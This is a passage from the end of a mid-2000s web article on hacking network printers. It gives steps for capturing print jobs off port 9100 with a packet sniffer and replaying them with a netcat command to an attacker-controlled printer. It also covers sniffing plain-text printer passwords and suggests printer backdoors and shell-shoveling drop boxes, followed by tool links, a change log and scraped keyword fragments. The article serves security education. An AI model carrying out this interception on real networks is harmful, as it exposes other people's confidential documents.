3. Once print.dump has been opened in Ethereal we need to filter it. Enter the following filter and hit Apply:

tcp.flags.syn == 1 && tcp.dstport == 9100


31 of 37 02/04/2009 08:17

4. As you see from the screen shot above the filter got

rid of a lot of the extraneous data. These four packets

represent two print jobs, or at least the beginnings of

them. Packets number 158 and 159 are part of the same

print job. Packets number 510 and 511 are part the 2nd

print job. What we want to do now is right click every

other packet, starting with the first, and choose "Follow

TCP Stream".


32 of 37 02/04/2009 08:17

5. Once you have chosen "Follow TCP Stream" you should see a window something like the one above. Set the drop

down box to only show the traffic destined to the network printer as shown above. Set the data type to RAW and

then click the "Save As" button and call the output file something like "test1.job".

6. Repeat steps 4 and 5 for every other packet to get all of the print jobs captured.

7. At this point we could open up test "test1.job" in a text editor, and if it's a PostScript file, remove every line before:

%!PS-Adobe-3.0

and after:

%%EOF

to create a .PS file (PostScript) that could be opened up in GhostView on a *nix box. You might be able to do

something similar with a PCL based print job, but I have not figured out what parts to remove yet. As it stands we can

leave "test1.job" as it is, whether it's PCL or PostScript, and send it to the printer by replaying it with NetCat to a

network printer we control. The command is quite simple:

cat test1.job|netcat -q 0 192.168.1.2 9100

where "test1.job" is the sniffed print job we want to replay and 192.168.1.2 is a network printer that we control. If the

Netcat command seems too complex you could also just use an FTP client and FTP the captured print jobs to a

JetDirect enabled printer (assuming FTP is enabled on the JetDirect box).

All this seems a bit complicated I know, so I'm thinking of asking the Cain team to add this functionality to their

app to make it easier.


33 of 37 02/04/2009 08:17

A note on Plain-text authentication protocols

Many of the above attacks are only possible because people don't enable passwords on their network printers.

However, even if passwords are enabled they could still be sniffed pretty easily since most network printers use

simple telnet or a web interface with out SSL to configure the system. Both telnet and http (with out SSL) passwords

can easily be sniffed with packages like Ettercap, Cain or Dsniff. Some newer network printers, such as the HP

Jetdirect en3700 (J7942A), can use SSL with their web interface (albeit with a self signed certificate) and the

interface seems to be more that just a Java applet for using SNMP to control the Jetdirect. This is a much more secure

option than the older Jetdirects that used unencrypted HTTP and SNMP v1/v2.

Other Ideas

There's still a lot more out there I need to research and play with when it comes to hacking network printers. As

with most of my projects this is a work in progress so feel free to email me your ideas. A few interesting topics might

be:

Using Phenoelit's ChaiServices information to create worms, backdoor and other malware for HP

JetDirect printers.

Modifying the PFT source code to make automated apps for searching an IP space and pulling files off of

the network printers.

Vulnerabilities in network printer implementation like buffer overflows and such.

Hacking the firmware in JetDirects to create dial home (shell shoveling) drop boxes that could be left

behind on target networks to help with intrusions. For those wanting to help install the HP Download Manager

and look in "C:\Program Files\Hewlett-Packard\HP Download Manager\Upgrades\jetdirect" for the vendor

firmwares.

Tracking Dots: http://www.eff.org/Privacy/printers/list.php

Also don't forget to check out SecurityFocus' online vulnerabilities database (http://www.securityfocus.com/) to

see if your particular network printers have any outstanding issues. I know they have a few issues listed for some of

the JetDirect boxes. While you're at it, check for vulnerabilities in the base OS that the network printer uses,

VxWorks in the case of some JetDirects and NetBSD for the Ricoh Savins.

I hope you have found this article interesting. If you have any ideas or comments please feel free to e-mail me.

Happy printer hacking.

Links to Tools:

HP Web JetAdmin (without registering)

http://www.svrops.com/svrops/dwnldprog.htm

HP JetAdmin for Window 2000 3.42, the last version to be released

http://www.helpdesk.umd.edu/os/windows_nt/printing/674/

HP Download Manager (for upgrading firmware)

http://www.hp.com/go/dlm_sw

Ghostscript, Ghostview and GSview

http://www.cs.wisc.edu/~ghost/

SmartDeviceMonitor

http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=

19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=

Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA

Foundstone's SNScan (find network printers that use SNMP, which seems to be most of them)


34 of 37 02/04/2009 08:17

http://www.foundstone.com/resources/proddesc/snscan.htm

SoftPerfect's NetScan (also useful for scanning for SNMP services)

http://www.softperfect.com/products/networkscanner/

Silicosis' HP Printer Display Hack

http://www.irongeek.com/i.php?page=security/hphack

Irongeek's GUI HP Printer Display Hack

http://www.irongeek.com/i.php?page=security/jetdirecthack

IPIterator

http://www.irongeek.com/i.php?page=security/ipiterator

Hijetter

http://www.phenoelit.de/hp/download.html

Ettercap

http://ettercap.sourceforge.net/

Ethereal

http://www.ethereal.com/

NetCat

http://netcat.sourceforge.net/

Net-SNMP

http://net-snmp.sourceforge.net/

Media:

Here's a collection of videos and other media on Network Printer Hacking you might be interest in:

Network Printer Hacking: Irongeek's Presentation at Notacon 2006

http://irongeek.com/i.php?page=videos/notacon2006printerhacking

Slide and other resources from the above presentation

http://irongeek.com/downloads/notacon2006.zip

Infonomicon TV Ep 7

http://irongeek.com/i.php?page=videos/infonomicontv7

Useful links for further research:

Common print server port numbers

http://members.cruzio.com/~jeffl/sco/lp/printservers.htm

HP's guide to securing JetDirect printers

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999

Understanding, Reversing, and Hacking HP Printers by Slobotron

http://www.searchlores.org/realicra/hp_slobo.htm

SecurityFocus' online vulnerabilities database

http://www.securityfocus.com/

Network Printers and Other Peripherals -- Vulnerabilities and Fixes by Dennis Mattison (Littlew0lf)

http://members.cox.net/ltlw0lf/printers/index.html

older version: http://freshmeat.net/articles/view/445/

Securing Network Print Jobs - An LRS White Paper

http://www.lrs.com/EOM/Solutions/Papers/secure.aspx


35 of 37 02/04/2009 08:17

Printer Job Language Technical Reference Manual

http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf

Printers, Proxies and Pranksters An April Fool's Recipe for Fun by Kellegous

http://web.kellegous.com/scratch/2003/printers1KBXB/

RICOH Aficio 2035 "security'' by mslaviero

http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/

Special thanks to Nancy for proof reading and making my English intelligible.

Change Log

02/06/2007: I've updated info on the fix for the Pharos cached print job vulnerability

01/20/2007: HP seems to have released a fix for the FTP DoS problem. See the Printer DoSing section.

01/10/2007: Fixed and added some links in the Printer DoSing section.

01/06/2007: Add information on the Joxean Koret attack to the Printer DoSing section.

04/18/2006: Added link to a newer version of Littlew0lf's article.

04/10/2006: Added Media section.

04/02/2006: Added a bunch of information for my presentation at Notacon 2006

Added section: Stupid Printer Tricks

Added section: Finding info about the printer using SNMP tools.

Added section: Finding Printers with Google.

Added section: RSH commands and Richo Savin Aficio Printers.

Added section: Spamming Printers.

Added section: Getting a JetDirect password remotely using the SNMP vulnerability

Added information about SSL with newer Jetdirects to A note on Plain-text authentication protocols and

JetDirect password notes sections.

Added information on SmartDeviceMonitor to Finding Network printers using Nmap and SNMP tools

and Finding info about the printer using SNMP tools as well as adding screenshot of the SNMP tools

mentioned. I also added some details on finding network printers via their MAC address.

Added information on holding a connection to port 9100/tcp to DoSing the network or the printer.

Added information on IPX/AppleTalk/SMB to Intro to the concepts.

Added alternate Perl script and added PHP web form to Coding your own scripts with PHP, Perl and

PJL.

Added HP firmware location to Other Ideas.

01/18/2006: Added section on Fixing a busted hard drive with Ghost.

09/14/2005: Found another missing image, the LCD Display icon from Hijetter. It's fixed now. I also added a link

suggested by Dick from Hack A Day.

09/14/2005: Hack A Day added a link to this site and I noticed that the Hijetter file system image was broken. It

should be fixed now.

09/13/2005: Added "Coding your own scripts with Perl and PJL" section.

09/11/2005: First posted.

Irongeek's Notes For Later:

nano /etc/init.d/sysklogd

-r

LAND attacks


36 of 37 02/04/2009 08:17

If you would like to republish one of the articles from this site on your webpage or print journal please contact

IronGeek.

Copyright 2007, IronGeek


37 of 37 02/04/2009 08:17

hacking network printers (m

Documents

psubcatname

pcatnamesolutionsamp

hp download

busted hard

buttmonkey

hacking network

rootbalrog

pproductnamesmartdevicemonitoramp